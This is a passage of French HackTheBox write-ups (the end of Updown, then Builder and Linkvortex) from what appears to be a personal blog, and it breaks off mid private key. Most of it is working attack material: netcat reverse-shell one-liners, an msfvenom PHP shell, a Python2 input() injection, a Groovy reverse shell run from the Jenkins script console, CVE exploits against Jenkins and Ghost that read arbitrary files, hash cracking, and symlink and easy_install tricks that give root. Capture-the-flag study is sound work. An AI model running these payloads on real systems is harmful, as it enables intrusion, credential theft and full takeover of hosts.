fclose($pipes[2]); proc_close($process); } ?\u0026gt; La meilleure technique aurait été de directement généré un reverse shell php à l\u0026rsquo;aide de msfvenom. Ce code php teste 1 par 1 toutes les fonctions permettant l\u0026rsquo;execution de commandes systèmes :\n1 msfvenom -p php/reverse_php LHOST=10.10.14.14 LPORT=1337 -f raw \u0026gt; shell.php En utilisant ce code, on obient directement un reverse shell à l\u0026rsquo;aide de proc_open. Le problème avec cette méthode est qu\u0026rsquo;on ne sait pas forcement quelle fonction à permis d\u0026rsquo;obtenir le reverse shell.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.11.177. Ncat: Connection from 10.10.11.177:49708. socket_create whoami www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.14 1338 \u0026gt;/tmp/f ------------------- # Better shell $ nc -lnvp 1338 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1338 Ncat: Listening on 0.0.0.0:1338 Ncat: Connection from 10.10.11.177. Ncat: Connection from 10.10.11.177:35496. sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ export TERM=xterm \u0026lt;ab47bcda3749f056619b17b959cdd659$ export TERM=xterm www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ ^Z [1] + 13292 suspended nc -lnvp 1338 [exegol-pentest] downloads # stty raw -echo;fg [1] + 13292 continued nc -lnvp 1338 www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ www-data -\u0026gt; developer SUID binary - Python Injection On trouve un binaire siteiup. En l\u0026rsquo;executant, on se rend compte qu\u0026rsquo;il interprete directement le code de \u0026ldquo;siteisup_test.py\u0026rdquo;.\n1 2 3 4 5 6 7 8 9 www-data@updown:/home/developer$ ls dev user.txt www-data@updown:/home/developer$ cd dev www-data@updown:/home/developer/dev$ ls -lah total 32K drwxr-x--- 2 developer www-data 4.0K Jun 22 2022 . drwxr-xr-x 6 developer developer 4.0K Aug 30 2022 .. -rwsr-x--- 1 developer www-data 17K Jun 22 2022 siteisup -rwxr-x--- 1 developer www-data 154 Jun 22 2022 siteisup_test.py Dans ce code Python, on observe l\u0026rsquo;utilisation de la fonction \u0026ldquo;input\u0026rdquo;. De plus, le code est executé avec Python2 et non pas Python3. Sous Python2, lors de l\u0026rsquo;utilisation de la fonction \u0026ldquo;input\u0026rdquo; Python ne considère pas par défaut qu\u0026rsquo;il s\u0026rsquo;agit d\u0026rsquo;une String, et tente donc de le parser. On peut donc injecter du code python pour ouvrir un reverse shell. Sous Python3, la sortie de input(\u0026quot;\u0026quot;) est une Str par défaut donc pas d\u0026rsquo;injection possible :\nPayload:\nimport(\u0026lsquo;os\u0026rsquo;).system(\u0026lsquo;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.14 8888 \u0026gt;/tmp/b\u0026rsquo;)\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import requests url = input(\u0026#34;Enter URL here:\u0026#34;) page = requests.get(url) if page.status_code == 200: print \u0026#34;Website is up\u0026#34; else: print \u0026#34;Website is down\u0026#34; ------------------------- www-data@updown:/home/developer/dev$ ./siteisup Welcome to \u0026#39;siteisup.htb\u0026#39; application Enter URL here:__import__(\u0026#39;os\u0026#39;).system(\u0026#39;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.14 8888 \u0026gt;/tmp/b\u0026#39;) rm: cannot remove \u0026#39;/tmp/b\u0026#39;: No such file or directory On obtient un nouveau reverse shell en tant que \u0026lsquo;developer\u0026rsquo;\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 $ nc -lnvp 8888 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 10.10.11.177. Ncat: Connection from 10.10.11.177:45492. developer@updown:/home/developer/dev$ whoami whoami developer developer@updown:/home/developer/dev$ cd .. developer@updown:/home/developer$ ls -l .ssh ls -l .ssh total 12 -rw-rw-r-- 1 developer developer 572 Aug 2 2022 authorized_keys -rw------- 1 developer developer 2602 Aug 2 2022 id_rsa -rw-r--r-- 1 developer developer 572 Aug 2 2022 id_rsa.pub developer@updown:/home/developer$ cat .ssh/id_rsa cat .ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn ........ 3zga8EzubgwnpU7r9hN2jWboCCIOeDtvXFv08KT8pFDCCA+sMa5uoWQlBqmsOWCLvtaOWe N4jA+ppn1+3e0AAAASZGV2ZWxvcGVyQHNpdGVpc3VwAQ== -----END OPENSSH PRIVATE KEY----- On trouve la clé SSH de developer nous permettant de nous connecter facilement via ce protocole :\n1 2 3 4 5 6 7 8 $ vim developer.key $ chmod 600 developer.key $ ssh developer@10.10.11.177 -i developer.key Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64) .... Last login: Tue Aug 30 11:24:44 2022 from 10.10.14.36 developer@updown:~$ cat user.txt d235....edcf developer -\u0026gt; root easy_install as root 1 2 3 4 5 6 developer@updown:~$ sudo -l Matching Defaults entries for developer on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User developer may run the following commands on localhost: (ALL) NOPASSWD: /usr/local/bin/easy_install Sur GTFObins, on trouve un chemin d\u0026rsquo;exploitation pour passer root:\nhttps://gtfobins.github.io/gtfobins/easy_install/\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 TF=$(mktemp -d) echo \u0026#34;import os; os.execl(\u0026#39;/bin/sh\u0026#39;, \u0026#39;sh\u0026#39;, \u0026#39;-c\u0026#39;, \u0026#39;sh \u0026lt;$(tty) \u0026gt;$(tty) 2\u0026gt;$(tty)\u0026#39;)\u0026#34; \u0026gt; $TF/setup.py sudo easy_install $TF ------------------------ developer@updown:/tmp$ TF=$(mktemp -d) developer@updown:/tmp$ echo \u0026#34;import os; os.execl(\u0026#39;/bin/sh\u0026#39;, \u0026#39;sh\u0026#39;, \u0026#39;-c\u0026#39;, \u0026#39;sh \u0026lt;$(tty) \u0026gt;$(tty) 2\u0026gt;$(tty)\u0026#39;)\u0026#34; \u0026gt; $TF/setup.py developer@updown:/tmp$ sudo easy_install $TF WARNING: The easy_install command is deprecated and will be removed in a future version. Processing tmp.hlSwiYYkel Writing /tmp/tmp.hlSwiYYkel/setup.cfg Running setup.py -q bdist_egg --dist-dir /tmp/tmp.hlSwiYYkel/egg-dist-tmp-KNZfWR # whoami root # cat /root/root.txt 7077....3986 Il suffit de créer un dossier, avec un fichier setup.py expliquant comment notre module python doit s\u0026rsquo;installer. On injecte un code malveillant dans ce fichier et il sera executer en tant que root lors du lancement de easy_install.\n","date":"2025-10-30T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/updown-htb/","title":"HTB | Updown"},{"content":" Machine name OS IP Difficulty Builder Windows 10.10.11.10 Medium Users 1 - jennifer : **princess** Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.10 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc= | 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM 8080/tcp open http syn-ack ttl 62 Jetty 10.0.18 |_http-title: Dashboard [Jenkins] | http-robots.txt: 1 disallowed entry |_/ |_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Jetty(10.0.18) Foothold Jenkins 2.441 - port 8080 Local File Inclusion - CVE-2024-23897 On trouve sur internet que Jenkins 2.441 est vulnérable à une LFI, permettant d\u0026rsquo;accéder à n\u0026rsquo;importe quel fichier sur la machine : https://www.exploit-db.com/exploits/51993\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 $ python3 exploit.py -u http://10.10.11.10:8080 Press Ctrl+C to exit File to download: \u0026gt; /etc/hosts ff02::1\tip6-allnodes ff02::2\tip6-allrouters 172.17.0.2\t0f52c222a4cc ::1\tlocalhost ip6-localhost ip6-loopback ff00::0\tip6-mcastprefix 127.0.0.1\tlocalhost fe00::0\tip6-localnet File to download: \u0026gt; /etc/passwd www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin root:x:0:0:root:/root:/bin/bash mail:x:8:8:mail:/var/mail:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin jenkins:x:1000:1000::/var/jenkins_home:/bin/bash games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync Dans le /etc/hosts, on trouve:\n172.17.0.2\t0f52c222a4cc\nOn en déduit que jenkins tourne dans un docker, au vu de l\u0026rsquo;ip en 172 et du hostname en hexadecimal.\nDans /etc/passwd, on trouve le dossier contenant les fichiers de Jenkins:\njenkins:x:1000:1000::/var/jenkins_home:/bin/bash\nToujours à l\u0026rsquo;aide de la LFI, on tente de récupérer le fichier de configuration de Jenkins pour obtenir des credentials :\n/var/jenkins_home\nEn cherchant sur internet, je comprends que chaque utilisateur à un fichier config.xml contenant probablement le hachage de leur mot de passe.\n/var/lib/jenkins/users/jenkins_[udid]/config.xml\nDe plus, j\u0026rsquo;ai télécharger la version de Jenkins 2.441 que j\u0026rsquo;ai installé sur une machine virtuelle, afin de pouvoir observer correctement l\u0026rsquo;arborescence des fichiers. Sur le dashboard de Jenkins, j\u0026rsquo;ai trouvé le nom d\u0026rsquo;utilisateur \u0026ldquo;jennifer\u0026rdquo; qui semble correspondre au compte administrateur.\nEn regardant de plus près dans les fichiers de mon installation de Jenkins, j\u0026rsquo;ai trouvé un fichier /var/lib/jenkins/users/users.xml contenant la liste des users et leur uid. En dumpant ce fichier, on trouve l\u0026rsquo;uid de jennifer, et donc le nom du dossier:\njennifer_12108429903186576833\n1 2 3 4 5 6 7 8 9 10 11 \u0026gt; /var/jenkins_home/users/users.xml \u0026lt;?xml version=\u0026#39;1.1\u0026#39; encoding=\u0026#39;UTF-8\u0026#39;?\u0026gt; \u0026lt;string\u0026gt;jennifer_12108429903186576833\u0026lt;/string\u0026gt; \u0026lt;idToDirectoryNameMap class=\u0026#34;concurrent-hash-map\u0026#34;\u0026gt; \u0026lt;entry\u0026gt; \u0026lt;string\u0026gt;jennifer\u0026lt;/string\u0026gt; \u0026lt;version\u0026gt;1\u0026lt;/version\u0026gt; \u0026lt;/hudson.model.UserIdMapper\u0026gt; \u0026lt;/idToDirectoryNameMap\u0026gt; \u0026lt;hudson.model.UserIdMapper\u0026gt; \u0026lt;/entry\u0026gt; Enfin, je tente de récupérer le fichier config.xml de jennifer :\n1 2 3 4 5 6 7 8 9 10 11 12 File to download: \u0026gt; /var/jenkins_home/users/jennifer_12108429903186576833/config.xml ... \u0026lt;?xml version=\u0026#39;1.1\u0026#39; encoding=\u0026#39;UTF-8\u0026#39;?\u0026gt; \u0026lt;fullName\u0026gt;jennifer\u0026lt;/fullName\u0026gt; \u0026lt;seed\u0026gt;6841d11dc1de101d\u0026lt;/seed\u0026gt; \u0026lt;id\u0026gt;jennifer\u0026lt;/id\u0026gt; \u0026lt;version\u0026gt;10\u0026lt;/version\u0026gt; \u0026lt;tokenStore\u0026gt; \u0026lt;filterExecutors\u0026gt;false\u0026lt;/filterExecutors\u0026gt; \u0026lt;io.jenkins.plugins.thememanager.ThemeUserProperty plugin=\u0026#34;theme-manager@215.vc1ff18d67920\u0026#34;/\u0026gt; \u0026lt;passwordHash\u0026gt;#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a\u0026lt;/passwordHash\u0026gt; J\u0026rsquo;ai obtenu le hachage de jennifer sur lequel j\u0026rsquo;ai pu effectuer une attaque par dictionnaire avec la liste rockyou.txt :\n1 2 $ hashcat -m 3200 hash.txt ~/wordlists/rockyou.txt --show $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess On obtient finalement les credentials de jennifer nous permettant d\u0026rsquo;obtenir un accès administrateur sur l\u0026rsquo;interface web de Jenkins :\njennifer : princess Jenkins Reverse Shell http://10.10.11.10:8080/manage/script\n1 2 3 4 5 6 7 8 9 10 11 12 13 String host=\u0026#34;10.10.14.11\u0026#34;;int port=1337;String cmd=\u0026#34;bash\u0026#34;;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u0026gt;0)so.write(pi.read());while(pe.available()\u0026gt;0)so.write(pe.read());while(si.available()\u0026gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ------------------- nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.11.10. Ncat: Connection from 10.10.11.10:34418. cat /var/jenkins_home/user.txt 7712.....64b9 Privilege Escalation Root - SSH Private Key https://devops.stackexchange.com/questions/2191/how-to-decrypt-jenkins-passwords-from-credentials-xml\nOn trouve un fichier credentials.xml contenant un secret chiffré :\n/var/jenkins_home/credentials.xml :\n1 2 3 4 5 6 7 8 9 10 \u0026lt;?xml version=\u0026#39;1.1\u0026#39; encoding=\u0026#39;UTF-8\u0026#39;?\u0026gt; ... \u0026lt;com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin=\u0026#34;credentials@1319.v7eb_51b_3a_c97b_\u0026#34;\u0026gt; \u0026lt;java.util.concurrent.CopyOnWriteArrayList\u0026gt; \u0026lt;privateKey\u0026gt;{AQAAABAAAAowLrfCrZx9baWliwrtC...........HaB1OTIcTxtaaMR8IMMaKSM=}\u0026lt;/privateKey\u0026gt; \u0026lt;/privateKeySource\u0026gt; \u0026lt;username\u0026gt;root\u0026lt;/username\u0026gt; \u0026lt;usernameSecret\u0026gt;false\u0026lt;/usernameSecret\u0026gt; \u0026lt;/com.cloudbees.plugins.credentials.domains.Domain\u0026gt; ... Après quelques recherches sur le web, on comprend que les informations contenus dans ce fichier correspondent à des mots de passe ou clés SSH chiffrés, associés à des utilisateurs. Sur l\u0026rsquo;interface graphique de Jenkins, on observe qu\u0026rsquo;une clé SSH semble enregistrée pour un utilisateur root.\nSur un forum en ligne, on nous explique que le secret dans la balise \u0026ldquo;\u0026rdquo; du fichier credentials.xml peut etre déchiffré en se rendant dans la console disponible sur la GUI : http://10.10.11.10:8080/script\nIl suffit alors d\u0026rsquo;executer la commande suivante :\nprintln(hudson.util.Secret.decrypt(\u0026quot;{PRIVATE_KEY}\u0026quot;))\nCe qui nous donne :\nprintln(hudson.util.Secret.decrypt(\u0026quot;{AQAAABAAAAo\u0026hellip;IcTxtaaMR8IMMaKSM=}\u0026quot;))\nSur le screenshot, on observe l\u0026rsquo;execution du script qui nous permet de récupérer une clé privée SSH :\nSSH as root A l\u0026rsquo;aide de la clé SSH, on se connecte directement en tant que root sur la machine :\n1 2 3 4 5 6 7 8 9 10 $ vim root.key $ chmod 600 root.key $ ssh root@10.10.11.10 -i root.key Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64) ... Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40 root@builder:~# ls root.txt root@builder:~# cat root.txt a9aa.....0396 ","date":"2025-10-25T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/builder-htb/","title":"HTB | Builder"},{"content":" Machine name OS IP Difficulty Linkvortex Linux 10.10.11.47 Easy Users 1 2 3 4 # Ghost application admin@linkvortex.com : OctopiFociPilfer45 # SSH bob : fibber-talented-worth Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.47 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3ef8b968c8eb570fcb0b47b9865083eb (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA= | 256 a2ea6ee1b6d7e7c58669ceba059e3813 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz 80/tcp open http syn-ack ttl 63 Apache httpd |_http-title: Did not follow redirect to http://linkvortex.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache Foothold linkvortex.htb - Ghost 5.58 On se connecte au port 80 qui nous redirige vers : http://linkvortex.htb A l\u0026rsquo;aide Wappalyzer, on identifie Ghost CMS version 5.58.\nSubdomain Enumeration - dev dev.linkvortex.htb\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ gobuster vhost -u \u0026#34;linkvortex.htb\u0026#34; -w `fzf-wordlists` --append-domain =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://linkvortex.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: gobuster/3.6 [+] Timeout: 10s [+] Append Domain: true =============================================================== Starting gobuster in VHOST enumeration mode =============================================================== Found: dev.linkvortex.htb Status: 200 [Size: 2538] $ cat /etc/hosts 10.10.11.47 linkvortex.htb dev.linkvortex.htb .git On trouve un fichier .git, on peut alors récupérer ce dossier git et l\u0026rsquo;analyser avec git-dumper\n1 2 3 4 5 6 7 8 9 10 11 12 $ dirsearch -u http://dev.linkvortex.htb _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://dev.linkvortex.htb/ [17:09:04] Scanning: [17:09:04] 301 - 239B - /.git -\u0026gt; http://dev.linkvortex.htb/.git/ ... git-dumper - Password Found On dump les fichiers du .git avec git-dumper :\n1 2 3 4 5 6 7 8 9 10 11 $ git-dumper http://dev.linkvortex.htb/.git ./git-dump/ [-] Testing http://dev.linkvortex.htb/.git/HEAD [200] [-] Testing http://dev.linkvortex.htb/.git/ [200] [-] Fetching .git recursively [-] Fetching http://dev.linkvortex.htb/.gitignore [404] [-] http://dev.linkvortex.htb/.gitignore responded with status code 404 ... [-] Fetching http://dev.linkvortex.htb/.git/objects/50/864e0261278525197724b394ed4292414d9fec [200] [-] Sanitizing .git/config [-] Running git checkout . Updated 5596 paths from the index J\u0026rsquo;ai cloné la véritable version de Ghost 5.58 et j\u0026rsquo;ai fais un diff avec le dump du .\n1 2 3 4 5 6 7 8 9 10 11 $ wget https://github.com/TryGhost/Ghost/archive/refs/tags/v5.58.0.zip $ unzip v5.58.0.zip $ diff -r ./Ghost-5.58.0 ./git-dump Only in ./git-dump: Dockerfile.ghost diff --color -r ./Ghost-5.58.0/ghost/core/test/regression/api/admin/authentication.test.js ./git-dump/ghost/core/test/regression/api/admin/authentication.test.js 56c56 \u0026lt; const password = \u0026#39;thisissupersafe\u0026#39;; --- \u0026gt; const password = \u0026#39;OctopiFociPilfer45\u0026#39;; Only in ./git-dump: .git password : OctopiFociPilfer45\nGhost Dashboard On trouve une page de login permettant d\u0026rsquo;accéeder au dashboard de Ghost :\nhttp://linkvortex.htb/ghost\nIntuitivement, on essaye de se connecter avec cette adresse email :\nadmin@linkvortex.htb Credentials :\n1 2 admin@linkvortex.htb OctopiFociPilfer45 Ghost Arbitrary File Read Exploit Après quelques recherches concernant la version 5.58 de Ghost, on trouve la CVE-2023-40028 permettant de lire n\u0026rsquo;importe quel fichier sur la machine de manière arbitraire en utilisant un le compte administrateur.\nhttps://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028\nEn utilisant la CVE, on tente de lire plusieurs fichiers. Dans /etc/passwd, seul l\u0026rsquo;utilisateur \u0026ldquo;node\u0026rdquo; semble avoir un dossier /home, ce qui est étonnant. Ensuite, on trouve le fichier /etc/hosts qui contient :\n172.20.0.2\t484b975c6616 Après vérification, les containers docker on souvent une ip en 172.x.x.x . L\u0026rsquo;hostname en hexadecimal fait également penser a un container docker.\nDe plus, on sait que l\u0026rsquo;application marche avec Node JS, et par défaut, les applications node js sont installées dans :\n/var/lib/[App] 1 2 3 4 5 6 7 8 9 10 11 $ ./exploit.sh -u admin@linkvortex.htb -p \u0026#39;OctopiFociPilfer45\u0026#39; -h http://linkvortex.htb WELCOME TO THE CVE-2023-40028 SHELL Enter the file path to read (or type \u0026#39;exit\u0026#39; to quit): /etc/hosts File content: 127.0.0.1\tlocalhost ::1\tlocalhost ip6-localhost ip6-loopback fe00::0\tip6-localnet ff00::0\tip6-mcastprefix ff02::1\tip6-allnodes ff02::2\tip6-allrouters 172.20.0.2\t484b975c6616 Par déduction, on tente donc de récupérer le fichier de configuration de l\u0026rsquo;application ghost :\n/var/lib/ghost/config.production.json\nOn trouve des credentials semblant permettre l\u0026rsquo;utilisation d\u0026rsquo;un serveur mail SMTP :\nbob@linkvortex.htb\nfibber-talented-worth\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Enter the file path to read (or type \u0026#39;exit\u0026#39; to quit): /var/lib/ghost/config.production.json File content: { \u0026#34;url\u0026#34;: \u0026#34;http://localhost:2368\u0026#34;, \u0026#34;server\u0026#34;: { \u0026#34;port\u0026#34;: 2368, \u0026#34;host\u0026#34;: \u0026#34;::\u0026#34; }, ... \u0026#34;mail\u0026#34;: { \u0026#34;transport\u0026#34;: \u0026#34;SMTP\u0026#34;, \u0026#34;options\u0026#34;: { \u0026#34;service\u0026#34;: \u0026#34;Google\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;linkvortex.htb\u0026#34;, \u0026#34;port\u0026#34;: 587, \u0026#34;auth\u0026#34;: { \u0026#34;user\u0026#34;: \u0026#34;bob@linkvortex.htb\u0026#34;, \u0026#34;pass\u0026#34;: \u0026#34;fibber-talented-worth\u0026#34; } } } } SSH to bob On peut finalement se connecter en SSH avec le compte utilisateur bob :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ ssh bob@10.10.11.47 bob@10.10.11.47\u0026#39;s password: # \u0026lt;\u0026lt;\u0026lt;\u0026lt; fibber-talented-worth Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the \u0026#39;unminimize\u0026#39; command. Last login: Tue Dec 3 11:41:50 2024 from 10.10.14.62 -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) bob@linkvortex:~$ cat user.txt 80f2.....24bb Privilege Escalation Enumeration 1 2 3 4 5 6 bob@linkvortex:~$ sudo -l Matching Defaults entries for bob on linkvortex: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT User bob may run the following commands on linkvortex: (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png clean_symlink.sh as root On peut executer ce script en tant que root, en passant fichier avec l\u0026rsquo;extension \u0026ldquo;.png\u0026rdquo; : /opt/ghost/clean_symlink.sh :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 #!/bin/bash QUAR_DIR=\u0026#34;/var/quarantined\u0026#34; if [ -z $CHECK_CONTENT ];then CHECK_CONTENT=false fi LINK=$1 if ! [[ \u0026#34;$LINK\u0026#34; =~ \\.png$ ]]; then /usr/bin/echo \u0026#34;! First argument must be a png file !\u0026#34; exit 2 fi if /usr/bin/sudo /usr/bin/test -L $LINK;then LINK_NAME=$(/usr/bin/basename $LINK) LINK_TARGET=$(/usr/bin/readlink $LINK) if /usr/bin/echo \u0026#34;$LINK_TARGET\u0026#34; | /usr/bin/grep -Eq \u0026#39;(etc|root)\u0026#39;;then /usr/bin/echo \u0026#34;! Trying to read critical files, removing link [ $LINK ] !\u0026#34; /usr/bin/unlink $LINK else /usr/bin/echo \u0026#34;Link found [ $LINK ] , moving it to quarantine\u0026#34; /usr/bin/mv $LINK $QUAR_DIR/ if $CHECK_CONTENT;then /usr/bin/echo \u0026#34;Content:\u0026#34; /usr/bin/cat $QUAR_DIR/$LINK_NAME 2\u0026gt;/dev/null fi fi fi 1ère essai :\nCreation d\u0026rsquo;un symlink n00b.png qui pointe vers /root/root.txt Execution du script ERROR : \u0026ldquo;! Trying to read critical files, removing link [ n00b.png ] !\u0026rdquo; On remarque que le script utilise readlink pour vérifier où pointe notre symlink. S\u0026rsquo;il pointe vers un fichier dans contenant dans son path \u0026ldquo;etc\u0026rdquo; ou \u0026ldquo;root\u0026rdquo; il ne le lit pas.\nPour bypasser cette protection, il suffit de créer deux symlink :\n1er symlink : n00b pointe vers /root/root.txt 2ème symlink : exploit.png pointe vers n00b Lorsqu\u0026rsquo;il vérifie où pointe le symlink exploit.png il trouve \u0026ldquo;n00b\u0026rdquo; et autorise donc sa lecture. Or, comme n00b pointe vers root.txt, le fichier s\u0026rsquo;affiche dans le terminal :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 bob@linkvortex:/var/quarantined$ ln -s /root/root.txt n00b bob@linkvortex:/var/quarantined$ ls n00b bob@linkvortex:/var/quarantined$ ln -s n00b exploit.png bob@linkvortex:/var/quarantined$ ls exploit.png n00b bob@linkvortex:/var/quarantined$ ls -lah total 8.0K drwxr-xr-x 2 bob bob 4.0K Oct 22 22:46 . drwxr-xr-x 14 root root 4.0K Nov 29 2024 .. lrwxrwxrwx 1 bob bob 4 Oct 22 22:46 exploit.png -\u0026gt; n00b lrwxrwxrwx 1 bob bob 14 Oct 22 22:45 n00b -\u0026gt; /root/root.txt bob@linkvortex:/var/quarantined$ cat n00b cat: n00b: Permission denied bob@linkvortex:/var/quarantined$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh exploit.png Link found [ exploit.png ] , moving it to quarantine /usr/bin/mv: \u0026#39;exploit.png\u0026#39; and \u0026#39;/var/quarantined/exploit.png\u0026#39; are the same file Content: 5f3e.....aebc9 Root shell On utilise l\u0026rsquo;exploit pour lire la clé SSH de l\u0026rsquo;utilisateur root et se connecter en SSH :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 bob@linkvortex:/var/quarantined$ ln -s /root/.ssh/id_rsa n00b bob@linkvortex:/var/quarantined$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh exploit.png Link found [ exploit.png ] , moving it to quarantine /usr/bin/mv: \u0026#39;exploit.png\u0026#39; and \u0026#39;/var/quarantined/exploit.png\u0026#39; are the same file Content: -----BEGIN OPENSSH PRIVATE KEY----- 